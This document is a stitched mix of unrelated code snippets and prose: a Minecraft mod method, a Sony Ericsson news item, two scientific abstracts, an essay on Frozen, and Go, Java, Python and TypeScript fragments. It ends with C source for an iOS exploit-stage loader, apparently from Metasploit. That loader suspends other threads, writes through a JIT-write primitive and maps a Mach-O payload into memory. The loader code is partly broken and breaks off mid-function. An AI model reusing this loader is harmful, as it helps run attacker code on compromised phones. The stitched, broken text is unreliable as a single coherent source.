Component tooltipMessage = new TranslatableComponent("jei.tooltip.error.recipe.transfer.no.server");
return handlerHelper.createUserErrorWithTooltip(tooltipMessage);
}
if (!transferHelper.canHandle(container, recipe)) {
return handlerHelper.createInternalError();
}
Map<Integer, Slot> inventorySlots = new HashMap<>();
for (Slot slot : transferHelper.getInventorySlots(container, recipe)) {
inventorySlots.put(slot.index, slot);
}
Map<Integer, Slot> craftingSlots = new HashMap<>();
for (Slot slot : transferHelper.getRecipeSlots(container, recipe)) {
craftingSlots.put(slot.index, slot);
}
IGuiItemStackGroup itemStackGroup = recipeLayout.getItemStacks();
int inputCount = 0;
{
// indexes that do not fit into the player crafting grid
Set<Integer> badIndexes = ImmutableSet.of(2, 5, 6, 7, 8);
int inputIndex = 0;
for (IGuiIngredient<ItemStack> ingredient : itemStackGroup.getGuiIngredients().values()) {
if (ingredient.isInput()) {
if (!ingredient.getAllIngredients().isEmpty()) {
inputCount++;
if (badIndexes.contains(inputIndex)) {
Component tooltipMessage = new TranslatableComponent("jei.tooltip.error.recipe.transfer.too.large.player.inventory");
return handlerHelper.createUserErrorWithTooltip(tooltipMessage);
}
}
inputIndex++;
}
}
}
// compact the crafting grid into a 2x2 area
List<IGuiIngredient<ItemStack>> guiIngredients = new ArrayList<>();
for (IGuiIngredient<ItemStack> guiIngredient : itemStackGroup.getGuiIngredients().values()) {
if (guiIngredient.isInput()) {
guiIngredients.add(guiIngredient);
}
}
IGuiItemStackGroup playerInvItemStackGroup = new GuiItemStackGroup(null, 0);
int[] playerGridIndexes = {0, 1, 3, 4};
for (int i = 0; i < 4; i++) {
int index = playerGridIndexes[i];
if (index < guiIngredients.size()) {
IGuiIngredient<ItemStack> ingredient = guiIngredients.get(index);
playerInvItemStackGroup.init(i, true, 0, 0);
playerInvItemStackGroup.set(i, ingredient.getAllIngredients());
}
}
Map<Integer, ItemStack> availableItemStacks = new HashMap<>();
int filledCraftSlotCount = 0;
int emptySlotCount = 0;
for (Slot slot : craftingSlots.values()) {
final ItemStack stack = slot.getItem();
if (!stack.isEmpty()) {
if (!slot.mayPickup(player)) {
LOGGER.error("Recipe Transfer helper {} does not work for container {}. Player can't move item out of Crafting Slot number {}", transferHelper.getClass(), container.getClass(), slot.index);
return handlerHelper.createInternalError();
}
filledCraftSlotCount++;
availableItemStacks.put(slot.index, stack.copy());
}
}
for (Slot slot : inventorySlots.values()) {
final ItemStack stack = slot.getItem();
if (!stack.isEmpty()) {
availableItemStacks.put(slot.index, stack.copy());
} else {
emptySlotCount++;
}
}
// check if we have enough inventory space to shuffle items around to their final locations
if (filledCraftSlotCount - inputCount > emptySlotCount) {
Component message = new TranslatableComponent("jei.tooltip.error.recipe.transfer.inventory.full");
return handlerHelper.createUserErrorWithTooltip(message);
}
RecipeTransferUtil.MatchingItemsResult matchingItemsResult = RecipeTransferUtil.getMatchingItems(stackHelper, availableItemStacks, playerInvItemStackGroup.getGuiIngredients());
if (matchingItemsResult.missingItems.size() > 0) {
Component message = new TranslatableComponent("jei.tooltip.error.recipe.transfer.missing");
matchingItemsResult = RecipeTransferUtil.getMatchingItems(stackHelper, availableItemStacks, itemStackGroup.getGuiIngredients());
return handlerHelper.createUserErrorForSlots(message, matchingItemsResult.missingItems);
}
List<Integer> craftingSlotIndexes = new ArrayList<>(craftingSlots.keySet());
Collections.sort(craftingSlotIndexes);
List<Integer> inventorySlotIndexes = new ArrayList<>(inventorySlots.keySet());
Collections.sort(inventorySlotIndexes);
// check that the slots exist and can be altered
for (Map.Entry<Integer, Integer> entry : matchingItemsResult.matchingItems.entrySet()) {
int craftNumber = entry.getKey();
int slotNumber = craftingSlotIndexes.get(craftNumber);
if (slotNumber < 0 || slotNumber >= container.slots.size()) {
LOGGER.error("Recipes Transfer Helper {} references slot {} outside of the inventory's size {}", transferHelper.getClass(), slotNumber, container.slots.size());
return handlerHelper.createInternalError();
}
}
if (doTransfer) {
PacketRecipeTransfer packet = new PacketRecipeTransfer(matchingItemsResult.matchingItems, craftingSlotIndexes, inventorySlotIndexes, maxTransfer, false);
Network.sendPacketToServer(packet);
}
return null;
}
}
|
Times have not been good for Japanese-Swedish cell phone maker Sony Ericsson. The company has been stuck with disappointing figures and mediocre products. Now it is focusing on Android smartphones and that’s paying off, says Jan Uddenfeldt, chief technology officer and head of Sony Ericsson Silicon Valley.
Uddenfeldt made the comments in a speech at Sony Ericsson’s annual Business Innovations Forum at Stanford yesterday. He believes the company can triple its market share in the U.S. in the near future. Right now the company is in the “Others” category in smartphone market share listings.
Globally Sony Ericsson’s market share in smartphones is approximately 5 percent. So there’s room to grow. The company has also been phasing out it’s feature phones and focusing it’s product development on the Android operating system.
Android and a bunch of new Xperia phones will be the key drivers to growth, said Uddenfeldt. The company has announced six Xperia smartphones that run the Android Gingerbread operating system.
One thing the company is counting on is gaming. The Xperia Play is the first PlayStation Certified smartphone, meaning the phone can run downloadable versions of original PlayStation games and use the PlayStation logo. It even has a slide-out PlayStation controller.
Both AT&T and Verizon will sell the phone when it’s released, but there’s still no official release date available.
While Android is the main focus of the company, it will still have a door open for Windows Phone 7. But it won’t be making any products if the operating system doesn’t take off, Uddenfeldt said. (It did previously manufacture phones with Windows Mobile OS.) Sony Ericsson already announced in September that it will abandon the Symbian operating system for good. |
Elucidation of Crystal-Chemical Determination Factor of Magnetic Anisotropy in HTSC
Easy axes of magnetization at room temperature in REBa<sub>2</sub>Cu<sub>3</sub>O<sub>y</sub> (RE: rare earth) and Bi<sub>2</sub>Sr<sub>2</sub>Ca<sub>1-x</sub>RE<sub>x</sub>Cu<sub>2</sub>O<sub>y</sub> were clarified using their powders oriented in a static magnetic field. The easy axes clearly depended on the type of RE which could be mainly explained in terms of second-order Stevens factors and magnetic anisotropy of the CuO<sub>2</sub> plane. Furthermore, we found the difference in magnetic effects of Er<sup>3+</sup> for orientation through systematic evaluations of Er-doped Y123 and Bi2212 powders. This result means that magnetic anisotropies of RE<sup>3+</sup> ions are sensitive to not only the type of RE but also local structure of oxygen ions surrounding RE<sup>3+</sup> ions. |
There are plenty of operas about teenage girls—love-sick, obsessed, hysterical teenage girls who dance, scheme, and murder in a frenzy of musical passion. Disney Princess films are also about teenage girls—lonely, skinny, logical teenage girls who follow their hearts because the plot gives them no other option. The music Disney Princesses sing can be divided into three periods that correspond to distinct animation styles:
Onto these three periods we can map the themes of the princess anthems, the single song for which each princess is remembered:
The relative lack of variance in these songs tells us something important—while animation styles have changed, the aspirations of girlhood have not been radically altered.
But then there’s Frozen.
Elsa’s anthem, “Let It Go,” combines aspects from all three periods: Frozen is a computer animated film, Idina Menzel is a Tony Award-winning singer, and, most importantly, the song and the Snow Queen who sings it have an operatic legacy rooted in representations of madness and infirmity. “Let It Go” is a tribute to passion, spontaneity, and instinct—elements celebrated by both the opera (which nevertheless punishes the bearer severely) and the Disney film (which channels them into heterosexual romance). Frozen does neither.
Unlike the songs of longing for belonging that came before it, “Let It Go” insists that being like everyone else is bound to fail. It’s a coming out song often read as a queer anthem and easily interpreted to account for a number of stigmatized identities. As such, Elsa is a screen onto which may be projected our fantasies and fears. While her transformation into a shapely princess swaying in a sparkly gown with wispy blond hair may be familiar, the scene where this takes place, the way she looks back at the viewer, and the music she sings define Elsa as more ambiguous than she appears. Is Elsa sick, is she mentally ill, is she asexual, is she gay? What is Elsa and why does she resonate so strongly with young girls?
Elsa is like the women of 19th-century opera in her exclusion from the world the other characters comfortably occupy. Marred by magical ability, Elsa must isolate herself if she does not want to scar those she loves—or so the dialogue tells us. The imagery suggests an illness; Elsa behaves as if she were contagious. Indeed, she is consumptive like Mimi, but she is also betrayed like Tosca and scandalous like The Queen of the Night. As Catherine Clément says of women in the opera: “they suffer, they cry, they die…Glowing with tears, their decolletés cut to the heart, they expose themselves to the gaze of those who come to take pleasure in their pretend agonies.” Operatic women express their hysteria skillfully. At the pinnacle of her agony, Elsa builds a magnificent castle while singing her most beautiful song, a song that has itself become infectious. In its final moments, she exposes herself, only to slam the door on viewers who would like nothing more than to gawk at the excess.
Most princess anthems end satisfactorily on the tonic chord, their musical conclusions coinciding with lyrical expectations that assure the story will fulfill the princesses’ desires. For example, when Ariel wishes she could be “part of that world”, she sings a high F, which a trombone echoes an octave lower, reinforcing the song’s key and suggesting the narrative’s interest in giving Ariel what she wants. In “Someday My Prince Will Come,” Snow White’s final line repeats the home pitch no less than six times as if to insist the screenwriters pay attention. “Let It Go,” on the other hand, ends unresolved. The score establishes a sharp distinction between the assertive melodic phrase sung by Elsa, “The cold never bothered me anyway,” and the harmonic manifestation of the accompaniment. Elsa turns her back to the camera after singing the downward moving line, which ends rather abruptly on the tonic, while the chord that ought to have shifted with Elsa’s exit lingers in the icy upper register of the strings, as if refusing to acknowledge the message. Is the music condemning the singer’s difference by suggesting that her immunity to the elements is indicative of a physical or psychic malady?
Unlike Donizetti’s operatic heroine, Lucia, whose infamous “mad scene” prompts the chorus to weep for her, Elsa stares into the camera, eyebrow raised, as if daring the spectators to pity her. This is the look of a woman who refuses to capitulate to patriarchy. And with our endless covers and video parodies of “Let It Go” we have rallied to her defense. Rather than constrain her by Frozen’s story, “Let It Go” lets Elsa escape again into possibility. The new princess message, “Leave Me Alone,” is echoed by little girls everywhere.
Peter Conrad says of opera, “It is the song of our irrationality, of the instinctual savagery which our jobs and routines and our nonsinging voices belie, or the music our bodies make. It is an art devoted to love and death (and especially to the cryptic alliance between them); to the definition and the interchangeability of the sexes; to madness and devilment…” Such is also a fair description of Frozen, for what are its final moments than an act of love to stave off death, what is Elsa but a mad and devilish woman who revels in the impermanence of sexuality, what is a fairytale but a story full of savage beasts that prey on our emotions. “Let It Go” releases an archetype from the hollows of diva history into the digital world of children’s animation.
Headline Image: Disney’s Frozen. DVD screenshot via Jennfier Fleeger. |
/**
*
* Write the data and return it's wrote position.
* @param logIndex the log index
* @param data data to write
* @return the wrote position
*/
public int appendData(final long logIndex, final byte[] data) {
this.writeLock.lock();
try {
assert (logIndex > getLastLogIndex());
final byte[] writeData = encodeData(data);
return doAppend(logIndex, writeData);
} finally {
this.writeLock.unlock();
}
} |
def parse_results(result: dict, vari: list) -> dict:
BB_dict = {}
for item in vari:
if item == "Seq":
BB_dict[item] = get_sequence(result[item]['value'])
else:
BB_dict[item] = result[item]['value']
return BB_dict |
Foreign accents reduce false recognition rates in the DRM paradigm
ABSTRACT More cognitive resources are required to comprehend foreign-accented than native speech. Focusing these cognitive resources on resolving the acoustic mismatch between the foreign-accented input and listeners’ stored representations of spoken words can affect other cognitive processes. Across two studies, we explored whether processing foreign-accented speech reduces the activation of semantic information. This was achieved using the DRM paradigm, in which participants study word lists and typically falsely remember non-studied words (i.e. critical lures) semantically associated with the studied words. In two experiments, participants were presented with word lists spoken both by a native and a foreign-accented speaker. In both experiments we observed lower false recognition rates for the critical lures associated with word lists presented in a foreign accent, compared to native speech. In addition, participants freely recalled more studied words when they had been presented in a native, compared to a foreign, accent, although this difference only emerged in Experiment 2, where the foreign speaker had a very strong accent. These observations suggest that processing foreign-accented speech modulates the activation of semantic information. Highlights The DRM paradigm was used to explore whether semantic activation is reduced when processing foreign-accented speech. Across two experiments, false recognition of non-studied semantic associates was lower when word lists were presented in a foreign accent, compared to native speech. The above results suggest semantic activation may be reduced when processing foreign-accented speech. Additionally, it was found that when the foreign speaker had a mild accent, correct recall of studied words was uninfluenced. If the foreign speaker had a strong accent, however, correct recall of studied words was reduced. |
<gh_stars>0
import {
usePopupModel,
useInitialFocus,
useReturnFocus,
useCloseOnOutsideClick,
useCloseOnEscape,
useFocusRedirect,
} from '@workday/canvas-kit-react/popup';
import {createModelHook} from '@workday/canvas-kit-react/common';
export const useDialogModel = createModelHook({
defaultConfig: usePopupModel.defaultConfig,
requiredConfig: usePopupModel.requiredConfig,
contextOverride: usePopupModel.Context,
})(config => {
const model = usePopupModel(config);
useInitialFocus(model);
useReturnFocus(model);
useCloseOnOutsideClick(model);
useCloseOnEscape(model);
useFocusRedirect(model);
return model;
});
|
package tmdb
import (
"errors"
"fmt"
"time"
yaml "gopkg.in/yaml.v2"
"github.com/agnivade/levenshtein"
polochon "github.com/odwrtw/polochon/lib"
tmdb "github.com/ryanbradynd05/go-tmdb"
"github.com/sirupsen/logrus"
)
// Make sure that the module is a detailer and a searcher
var (
_ polochon.Detailer = (*TmDB)(nil)
_ polochon.Searcher = (*TmDB)(nil)
)
// Register tvdb as a Detailer
func init() {
polochon.RegisterModule(&TmDB{})
}
// Module constants
const (
moduleName = "tmdb"
)
// API constants
const (
TmDBimageBaseURL = "https://image.tmdb.org/t/p/original"
)
// TmDB errors
var (
ErrInvalidArgument = errors.New("tmdb: invalid argument")
ErrMissingArgument = errors.New("tmdb: missing argument")
ErrNoMovieFound = errors.New("tmdb: movie not found")
ErrNoMovieTitle = errors.New("tmdb: can not search for a movie with no title")
ErrNoMovieImDBID = errors.New("tmdb: can not search for a movie with no imdb")
ErrFailedToGetDetails = errors.New("tmdb: failed to get movie details")
)
// TmDB implents the Detailer interface
type TmDB struct {
client *tmdb.TMDb
configured bool
}
// Params represents the module params
type Params struct {
APIKey string `yaml:"apikey"`
}
// Init implements the module interface
func (t *TmDB) Init(p []byte) error {
if t.configured {
return nil
}
params := &Params{}
if err := yaml.Unmarshal(p, params); err != nil {
return err
}
return t.InitWithParams(params)
}
// InitWithParams configures the module
func (t *TmDB) InitWithParams(params *Params) error {
if params.APIKey == "" {
return ErrMissingArgument
}
t.client = tmdb.Init(tmdb.Config{APIKey: params.APIKey})
t.configured = true
return nil
}
// Name implements the Module interface
func (t *TmDB) Name() string {
return moduleName
}
// Function to be overwritten during the tests
var tmdbSearchMovie = func(t *tmdb.TMDb, title string, options map[string]string) (*tmdb.MovieSearchResults, error) {
return t.SearchMovie(title, options)
}
// SearchByTitle searches a movie by its title. It adds the tmdb id into the
// movie struct so it can get details later
func (t *TmDB) searchByTitle(m *polochon.Movie, log *logrus.Entry) error {
// No title, no search
if m.Title == "" {
return ErrNoMovieTitle
}
// ID already found
if m.TmdbID != 0 {
return nil
}
// Add year option if given
options := map[string]string{}
if m.Year != 0 {
options["year"] = fmt.Sprintf("%d", m.Year)
}
// Search on tmdb
r, err := tmdbSearchMovie(t.client, m.Title, options)
if err != nil {
return err
}
// Check if there is any results
if len(r.Results) == 0 {
log.Debugf("Failed to find movie from imdb title %q", m.Title)
return ErrNoMovieFound
}
// Find the most accurate serie based on the levenshtein distance
var movieShort tmdb.MovieShort
minDistance := 100
for _, result := range r.Results {
d := levenshtein.ComputeDistance(m.Title, result.Title)
if d < minDistance {
minDistance = d
movieShort = result
}
}
m.TmdbID = movieShort.ID
log.Debugf("Found movie from title %q", m.Title)
return nil
}
// Function to be overwritten during the tests
var tmdbSearchByImdbID = func(t *tmdb.TMDb, id, source string, options map[string]string) (*tmdb.FindResults, error) {
return t.GetFind(id, "imdb_id", options)
}
// searchByImdbID searches on tmdb based on the imdb id
func (t *TmDB) searchByImdbID(m *polochon.Movie, log *logrus.Entry) error {
// No imdb id, no search
if m.ImdbID == "" {
return ErrNoMovieImDBID
}
// ID already found
if m.TmdbID != 0 {
return nil
}
// Search on tmdb
results, err := tmdbSearchByImdbID(t.client, m.ImdbID, "imdb_id", map[string]string{})
if err != nil {
return err
}
// Check if there is any results
if len(results.MovieResults) == 0 {
log.Debugf("Failed to find movie from imdb ID %q", m.ImdbID)
return ErrNoMovieFound
}
m.TmdbID = results.MovieResults[0].ID
log.Debugf("Found movie from imdb ID %q", m.ImdbID)
return nil
}
// Function to be overwritten during the tests
var tmdbGetMovieInfo = func(t *tmdb.TMDb, tmdbID int, options map[string]string) (*tmdb.Movie, error) {
return t.GetMovieInfo(tmdbID, options)
}
// Status implements the Module interface
func (t *TmDB) Status() (polochon.ModuleStatus, error) {
// Search for The Matrix on tmdb via imdbID
results, err := tmdbSearchByImdbID(t.client, "tt0133093", "imdb_id", map[string]string{})
if err != nil {
return polochon.StatusFail, err
}
// Check if there is any results
if len(results.MovieResults) == 0 {
return polochon.StatusFail, ErrNoMovieFound
}
return polochon.StatusOK, nil
}
// GetDetails implements the Detailer interface
func (t *TmDB) GetDetails(i interface{}, log *logrus.Entry) error {
m, ok := i.(*polochon.Movie)
if !ok {
return ErrInvalidArgument
}
// Search with imdb id
if m.ImdbID != "" && m.TmdbID == 0 {
err := t.searchByImdbID(m, log)
if err != nil && err != ErrNoMovieFound {
return err
}
}
// Search with title
if m.Title != "" && m.TmdbID == 0 {
err := t.searchByTitle(m, log)
if err != nil && err != ErrNoMovieFound {
return err
}
}
// At this point if the tmdb id is still not found we can't update the
// movie informations
if m.TmdbID == 0 {
return ErrFailedToGetDetails
}
// Fetch the full movie details and fill the polochon.Movie object
err := t.getMovieDetails(m)
if err != nil {
return err
}
return nil
}
// getMovieDetails will get the movie details and fill the polochon.Movie with
// the result
func (t *TmDB) getMovieDetails(movie *polochon.Movie) error {
// Search on tmdb
details, err := tmdbGetMovieInfo(t.client, movie.TmdbID, map[string]string{})
if err != nil {
return err
}
// Get the year from the release date
var year int
if details.ReleaseDate != "" {
date, err := time.Parse("2006-01-02", details.ReleaseDate)
if err != nil {
return err
}
year = date.Year()
}
// Get the movie genres
genres := []string{}
for _, g := range details.Genres {
genres = append(genres, g.Name)
}
// Update movie details
movie.ImdbID = details.ImdbID
movie.OriginalTitle = details.OriginalTitle
movie.Plot = details.Overview
movie.Rating = details.VoteAverage
movie.Runtime = int(details.Runtime)
movie.SortTitle = details.Title
movie.Tagline = details.Tagline
movie.Thumb = TmDBimageBaseURL + details.PosterPath
movie.Fanart = TmDBimageBaseURL + details.BackdropPath
movie.Title = details.Title
movie.Votes = int(details.VoteCount)
movie.Year = year
movie.Genres = genres
return nil
}
|
/**
* Test that the equals() method can distinguish all fields.
*/
public void testEquals() {
Font font1 = new Font("SansSerif", Font.PLAIN, 12);
Font font2 = new Font("SansSerif", Font.PLAIN, 14);
MarkerAxisBand a1 = new MarkerAxisBand(null, 1.0, 1.0, 1.0, 1.0, font1);
MarkerAxisBand a2 = new MarkerAxisBand(null, 1.0, 1.0, 1.0, 1.0, font1);
assertEquals(a1, a2);
a1 = new MarkerAxisBand(null, 2.0, 1.0, 1.0, 1.0, font1);
assertFalse(a1.equals(a2));
a2 = new MarkerAxisBand(null, 2.0, 1.0, 1.0, 1.0, font1);
assertTrue(a1.equals(a2));
a1 = new MarkerAxisBand(null, 2.0, 3.0, 1.0, 1.0, font1);
assertFalse(a1.equals(a2));
a2 = new MarkerAxisBand(null, 2.0, 3.0, 1.0, 1.0, font1);
assertTrue(a1.equals(a2));
a1 = new MarkerAxisBand(null, 2.0, 3.0, 4.0, 1.0, font1);
assertFalse(a1.equals(a2));
a2 = new MarkerAxisBand(null, 2.0, 3.0, 4.0, 1.0, font1);
assertTrue(a1.equals(a2));
a1 = new MarkerAxisBand(null, 2.0, 3.0, 4.0, 5.0, font1);
assertFalse(a1.equals(a2));
a2 = new MarkerAxisBand(null, 2.0, 3.0, 4.0, 5.0, font1);
assertTrue(a1.equals(a2));
a1 = new MarkerAxisBand(null, 2.0, 3.0, 4.0, 5.0, font2);
assertFalse(a1.equals(a2));
a2 = new MarkerAxisBand(null, 2.0, 3.0, 4.0, 5.0, font2);
assertTrue(a1.equals(a2));
} |
// CheckEndpoints validates endpoint_1 and endpoint_2.
func (fr *FirewallRule) CheckEndpoints() error {
endpoints := []*FirewallRuleEndpointType{
fr.GetEndpoint1(),
fr.GetEndpoint2(),
}
for _, endpoint := range endpoints {
if err := endpoint.ValidateEndpointType(); err != nil {
return err
}
}
return nil
} |
// GetDeviceState returns the current state with name stateName for the device with URL deviceURL
func (k *Kiz) GetDeviceState(deviceURL DeviceURL, stateName StateName) (DeviceState, error) {
resp, err := k.clt.GetDeviceState(string(deviceURL), string(stateName))
if err != nil {
return DeviceState{}, err
}
defer resp.Body.Close()
var result DeviceState
json.NewDecoder(resp.Body).Decode(&result)
return result, nil
} |
def list_indiv_from_pop(
dict_indiv_pop,
dict_indiv_superpop
):
list_pop = list(set(dict_indiv_pop.values()))
dict_list_pop = {}
for pop in list_pop:
list_pop = []
for indiv in dict_indiv_pop.keys():
if dict_indiv_pop[indiv] == pop:
list_pop.append(indiv)
dict_list_pop[pop] = list_pop
list_superpop = list(set(dict_indiv_superpop.values()))
dict_list_superpop = {}
for superpop in list_superpop:
list_superpop = []
for indiv in dict_indiv_superpop.keys():
if dict_indiv_superpop[indiv] == superpop:
list_superpop.append(indiv)
dict_list_superpop[superpop] = list_superpop
return dict_list_pop, dict_list_superpop |
<filename>src/java/org/xlattice/crypto/tls/TlsClientEngine.java
/* TlsClientEngine.java */
package org.xlattice.crypto.tls;
import java.io.IOException;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
public class TlsClientEngine extends TlsEngine {
protected TlsClientEngine (TlsContext ctx, TlsSession sess)
throws GeneralSecurityException, IOException {
super (ctx, sess);
engine.setUseClientMode(true);
}
}
|
#include <stdio.h>
#include <dlfcn.h>
#include <mach/mach.h>
#include <mach-o/fat.h>
#include <mach-o/loader.h>
#include <sys/mman.h>
#include <mach/vm_map.h>
#include "magic.h"
/*#define DEBUG 1*/
//asl_log isn't working, so: idevicesyslog | grep SandboxViolation
#ifdef DEBUG
#define debug_print(fmt, ...) \
do { \
char* buffer = malloc_func(1024); \
sprintf_func(buffer, fmt, __VA_ARGS__); \
fopen_func(buffer, "w"); \
free_func(buffer); \
} while (0)
//do { asl_log_func(0, 0, ASL_LEVEL_ERR, fmt, __VA_ARGS__); } while (0)
#else
#define debug_print(fmt, ...)
#endif
#define DLSYM_FUNC(func, library, return_type, args...) \
typedef return_type (*func##_ptr)(args); \
func##_ptr func##_func = dlsym_func(library, #func);
typedef void* (*t_dlsym)(void* handle, const char* symbol);
typedef void* (*t_dlopen)(const char* library, int rtld);
void load(void* buffer, t_dlsym _dlsym, void* jitwrite, void* jitstart, void* jitend);
void init(void* dlopen_addr, void* dlsym_addr, void* jitwrite_addr, uint64_t startOfFixMem, uint64_t endOfFixMem)
{
typedef void* (*dlsym_ptr)(void *handle, const char *symbol);
dlsym_ptr dlsym_func = dlsym_addr;
typedef void* (*dlopen_ptr)(const char *filename, int flags);
dlopen_ptr dlopen_func = dlopen_addr;
void* libsystem = dlopen_func("/usr/lib/libSystem.B.dylib", RTLD_NOW);
// Suspend threads
typedef mach_port_t (*mach_task_self_ptr)();
typedef thread_port_t (*mach_thread_self_ptr)();
typedef kern_return_t (*thread_suspend_ptr)(thread_act_t target_thread);
typedef kern_return_t (*task_threads_ptr)(task_t task, thread_act_array_t thread_list, mach_msg_type_number_t* thread_count);
void* libIOKit = dlopen_func("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_NOW);
mach_task_self_ptr mach_task_self_func = dlsym_func(libIOKit, "mach_task_self");
mach_thread_self_ptr mach_thread_self_func = dlsym_func(libIOKit, "mach_thread_self");
thread_suspend_ptr thread_suspend_func = dlsym_func(libsystem, "thread_suspend");
task_threads_ptr task_threads_func = dlsym_func(libsystem, "task_threads");
thread_act_t current_thread = mach_thread_self_func();
mach_msg_type_number_t thread_count;
thread_act_array_t thread_list;
kern_return_t result = task_threads_func(mach_task_self_func(), (thread_act_array_t)&thread_list, &thread_count);
if (!result && thread_count) {
for (unsigned int i = 0; i < thread_count; ++i) {
thread_act_t other_thread = thread_list[i];
if (other_thread != current_thread) {
thread_suspend_func(other_thread);
}
}
}
uint64_t payloadBuffer = endOfFixMem - (0x100000 - 0x10000);
#ifdef DEBUG
DLSYM_FUNC(malloc, libsystem, void*, size_t)
DLSYM_FUNC(free, libsystem, void*)
DLSYM_FUNC(sprintf, libsystem, int, char* str, const char * format, ... );
DLSYM_FUNC(fopen, libsystem, FILE*, const char * filename, const char * mode );
debug_print("%s", "hello from metasploit");
debug_print("%s", "hello from metasploit");
debug_print("%s", "hello from metasploit");
debug_print("%s", "hello from metasploit");
debug_print("%s", "hello from metasploit");
debug_print("main:%p", (void*)init);
debug_print("end:%p", (void*)endOfFixMem);
debug_print("buffer:%p", (void*)payloadBuffer);
debug_print("nbuffer:%p", (void*)*(uint64_t*)payloadBuffer);
debug_print("start:%p", (void*)startOfFixMem);
#endif
load((void*)payloadBuffer, (t_dlsym)dlsym_func, jitwrite_addr, (void*)startOfFixMem, (void*)endOfFixMem);
}
void fail(uint64_t x) {
*(volatile int*)(0xbad000000000ull + x) = 0xdead;
}
#define ASSERT(x) if (!(x))fail(0xa00000000ull + __LINE__)
#define MIN(x,y) ((x)<(y)?(x):(y))
#define MAX(x,y) ((x)>(y)?(x):(y))
void performJITMemcpy(t_dlsym _dlsym, void* jitwrite, void* startOfFixMem, void* dst, void* src, size_t size)
{
typedef void (*JITWriteSeparateHeapsFunction)(off_t, const void*, size_t);
JITWriteSeparateHeapsFunction jitWriteSeparateHeapsFunction = jitwrite;
ASSERT(jitWriteSeparateHeapsFunction);
ASSERT(startOfFixMem);
int (*_memcmp)(const void *, const void*, size_t) = _dlsym(RTLD_DEFAULT, "memcmp");
off_t offset = (off_t)((uintptr_t)dst - (uintptr_t)startOfFixMem);
jitWriteSeparateHeapsFunction(offset, src, size);
ASSERT(!_memcmp(dst, src, size));
}
static inline uintptr_t read_uleb128(uint8_t** pp, uint8_t* end)
{
uint8_t* p = *pp;
uint64_t result = 0;
int bit = 0;
do {
ASSERT(p != end);
uint64_t slice = *p & 0x7f;
ASSERT(bit <= 63);
else {
result |= (slice << bit);
bit += 7;
}
} while (*p++ & 0x80);
*pp = p;
return result;
}
static inline uintptr_t read_sleb128(uint8_t** pp, uint8_t* end)
{
uint8_t* p = *pp;
int64_t result = 0;
int bit = 0;
uint8_t byte;
do {
ASSERT(p != end);
byte = *p++;
result |= (((int64_t)(byte & 0x7f)) << bit);
bit += 7;
} while (byte & 0x80);
// sign extend negative numbers
if ( (byte & 0x40) != 0 )
result |= (-1LL) << bit;
*pp = p;
return result;
}
// <3 qwerty
void rebase(struct dyld_info_command* dyld_info,
uint8_t* map,
uintptr_t* segstart,
uintptr_t linkedit_base,
uintptr_t reloc_slide) {
uint8_t* start = map + dyld_info->rebase_off + linkedit_base;
uint8_t* end = start + dyld_info->rebase_size;
uintptr_t address = (uintptr_t)map;
uintptr_t count = 0, skip = 0;
char done = 0;
uint8_t* p = start;
while (!done && (p < end)) {
uint8_t immediate = *p & REBASE_IMMEDIATE_MASK;
uint8_t opcode = *p & REBASE_OPCODE_MASK;
++p;
switch (opcode) {
case REBASE_OPCODE_DONE:
done = 1;
break;
case REBASE_OPCODE_SET_TYPE_IMM:
ASSERT(immediate == REBASE_TYPE_POINTER);
break;
case REBASE_OPCODE_SET_SEGMENT_AND_OFFSET_ULEB:
address = (uintptr_t)(map + segstart[immediate] + read_uleb128(&p, end));
break;
case REBASE_OPCODE_ADD_ADDR_ULEB:
address += read_uleb128(&p, end);
break;
case REBASE_OPCODE_ADD_ADDR_IMM_SCALED:
address += immediate * sizeof(uintptr_t);
break;
case REBASE_OPCODE_DO_REBASE_IMM_TIMES:
for (int i=0; i < immediate; ++i) {
*(uintptr_t*)(address) += reloc_slide;
address += sizeof(uintptr_t);
}
break;
case REBASE_OPCODE_DO_REBASE_ULEB_TIMES:
count = read_uleb128(&p, end);
for (int i = 0; i < count; ++i) {
*(uintptr_t*)(address) += reloc_slide;
address += sizeof(uintptr_t);
}
break;
case REBASE_OPCODE_DO_REBASE_ADD_ADDR_ULEB:
*(uintptr_t*)(address) += reloc_slide;
address += read_uleb128(&p, end) + sizeof(uintptr_t);
break;
case REBASE_OPCODE_DO_REBASE_ULEB_TIMES_SKIPPING_ULEB:
count = read_uleb128(&p, end);
skip = read_uleb128(&p, end);
for (int i = 0; i < count; ++i) {
*(uintptr_t*)address += reloc_slide;
address += skip + sizeof(uintptr_t);
}
break;
default:
ASSERT(0);
break;
}
}
}
void bindit(struct dyld_info_command* dyld_info,
uint8_t* map,
uintptr_t* segstart,
uintptr_t linkedit_base,
t_dlsym _dlsym) {
uint8_t* start = map + dyld_info->bind_off + linkedit_base;
uint8_t* end = start + dyld_info->bind_size;
uintptr_t address = (uintptr_t)map;
uintptr_t count = 0, skip = 0;
char done = 0;
unsigned char type = 0;
uint8_t* p = start;
char* symbolName=0;
while (!done && (p < end)) {
uint8_t immediate = *p & BIND_IMMEDIATE_MASK;
uint8_t opcode = *p & BIND_OPCODE_MASK;
++p;
switch (opcode) {
case BIND_OPCODE_DONE:
done = 1;
break;
case BIND_OPCODE_SET_DYLIB_ORDINAL_IMM:
break;
case BIND_OPCODE_SET_DYLIB_ORDINAL_ULEB:
read_uleb128(&p, end);
break;
case BIND_OPCODE_SET_DYLIB_SPECIAL_IMM:
break;
case BIND_OPCODE_SET_SYMBOL_TRAILING_FLAGS_IMM:
symbolName = (char*)p;
while (*p != '\0')
++p;
++p;
break;
case BIND_OPCODE_SET_TYPE_IMM:
break;
case BIND_OPCODE_SET_SEGMENT_AND_OFFSET_ULEB:
address = (uintptr_t)(map + segstart[immediate] + read_uleb128(&p, end));
break;
case BIND_OPCODE_SET_ADDEND_SLEB:
read_sleb128(&p, end);
break;
case BIND_OPCODE_ADD_ADDR_ULEB:
address += read_uleb128(&p, end);
break;
case BIND_OPCODE_DO_BIND:
*(uintptr_t*)address = (uintptr_t)_dlsym(RTLD_DEFAULT, symbolName+1);
address += sizeof(uintptr_t);
break;
case BIND_OPCODE_DO_BIND_ADD_ADDR_ULEB:
*(uintptr_t*)address = (uintptr_t)_dlsym(RTLD_DEFAULT, symbolName+1);
address += read_uleb128(&p, end) + sizeof(uintptr_t);
break;
case BIND_OPCODE_DO_BIND_ADD_ADDR_IMM_SCALED:
*(uintptr_t*)address = (uintptr_t)_dlsym(RTLD_DEFAULT, symbolName+1);
